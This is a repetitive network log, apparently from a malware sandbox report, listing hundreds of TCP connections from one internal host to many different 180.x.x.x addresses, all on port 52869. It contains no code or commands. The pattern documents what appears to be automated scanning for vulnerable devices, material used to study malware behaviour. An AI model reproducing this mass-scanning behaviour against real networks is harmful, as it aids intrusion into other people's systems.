Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.244.192.186:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.160.241.222:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.242.236.84:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.0.234.32:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.145.104.102:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.179.151.83:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.255.53.4:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.123.206.207:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.226.192.228:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.14.15.109:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.25.226.146:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.58.29.94:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.13.50.37:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.212.29.117:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.10.9.134:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.93.168.240:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.222.67.1:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.128.104.187:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.166.28.238:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.215.239.219:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.194.32.188:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.188.151.253:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.195.229.205:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.234.62.39:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.63.56.241:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.43.91.239:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.1.229.253:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.65.68.120:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.84.84.106:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.114.49.248:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.58.196.197:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.61.174.42:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.255.176.22:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.10.103.245:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.226.141.143:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.60.147.230:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.16.51.121:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.45.22.109:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.26.6.99:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.216.124.118:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.122.192.15:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.19.95.196:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.222.155.148:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.94.54.126:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.2.181.85:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.151.206.178:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.193.197.4:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.72.12.139:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.55.243.247:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.204.157.209:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.152.19.203:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.90.45.19:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.232.137.103:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.88.154.60:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.5.199.114:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.211.243.106:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.56.232.88:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.69.88.17:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.217.198.85:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.145.51.79:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.78.30.202:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.80.65.22:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.70.54.11:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.92.179.39:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.244.23.142:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.165.119.203:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.26.221.191:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.117.110.20:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.247.4.242:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.204.35.251:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.206.186.193:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.227.182.185:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.226.75.53:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.167.158.202:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.164.120.29:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.246.255.59:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.174.209.229:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.70.54.53:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.138.49.227:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.137.221.96:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.29.194.116:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.124.107.200:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.73.186.211:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.160.211.158:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.86.141.117:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.193.7.144:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.2.167.216:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.50.179.63:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.36.12.198:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.18.247.125:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.61.101.56:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.111.200.207:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.40.66.164:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.183.41.20:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.199.238.90:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.234.43.51:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.139.205.12:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.28.161.25:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.116.201.215:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.200.116.49:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.55.10.210:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.1.65.118:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.42.229.99:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.229.137.222:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.222.62.235:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.246.173.54:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.85.188.138:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.63.31.170:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.125.152.40:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.164.14.127:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.160.178.202:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.92.30.24:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.90.188.56:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.131.241.36:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.216.25.4:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.183.94.75:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.43.239.39:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.119.152.220:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.162.58.142:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.25.1.160:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.10.25.142:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.38.129.66:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.211.113.142:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.59.156.51:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.138.63.20:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.43.249.214:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.101.155.158:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.162.187.191:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.218.249.86:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.228.53.159:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.169.197.104:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.121.235.116:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.237.184.78:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.228.227.5:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.109.244.74:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.24.212.124:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.202.61.72:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.185.144.46:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.49.113.104:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.236.55.255:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.175.230.178:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.50.47.141:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.51.232.113:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.68.250.115:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.154.219.152:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.40.46.130:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.162.35.219:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.90.184.113:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.25.92.115:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.43.235.85:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.157.86.46:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.250.76.3:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.82.89.250:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.173.9.83:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.12.8.19:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.105.190.151:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.162.9.104:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.109.177.147:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.73.89.57:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.1.183.235:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.52.74.45:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.16.206.55:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.88.81.208:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.173.95.255:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.215.158.61:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.22.82.40:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.161.48.49:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.231.148.134:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.212.105.4:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.151.66.110:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.43.35.135:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.62.245.240:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.173.199.140:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.80.152.222:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.44.26.74:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.29.160.206:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.153.17.149:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.231.180.52:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.88.251.146:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.85.250.208:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.110.136.245:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.183.106.44:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.84.228.85:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.148.34.222:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.237.126.63:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.158.189.19:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.179.171.221:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.246.4.100:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.24.175.87:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.25.243.15:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.96.78.23:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.25.91.205:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.115.119.250:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.152.231.12:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.11.21.6:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.254.59.62:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.79.132.23:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.196.236.175:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.205.178.1:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.228.86.231:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.60.137.136:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.73.53.5:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.148.137.216:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.106.207.80:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.77.18.63:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.134.163.60:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.251.224.120:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.101.228.192:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.131.136.242:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.41.155.53:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.24.143.76:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.192.14.168:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.123.113.2:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.206.64.244:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.38.19.251:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.243.71.180:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.16.201.48:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.65.94.253:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.250.206.163:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.40.161.168:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.4.241.106:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.150.178.132:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.221.226.8:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.188.105.137:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.235.228.231:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.172.15.76:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.38.228.242:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.156.178.70:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.254.33.120:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.74.191.153:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.56.208.99:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.201.225.61:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.242.112.249:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.181.142.208:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.97.21.181:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.58.74.93:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.229.198.207:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.228.89.107:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.93.173.87:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.16.164.228:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.118.10.172:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.203.112.247:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.125.38.5:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.240.29.24:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.30.80.228:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.153.177.167:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.104.207.86:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.148.57.55:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.111.143.57:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.233.255.43:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.118.88.219:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.85.185.190:52869 |
Source: global traffic | TCP traffic: 192.168.2.14:26784 -> 180.61.30.184:52869 |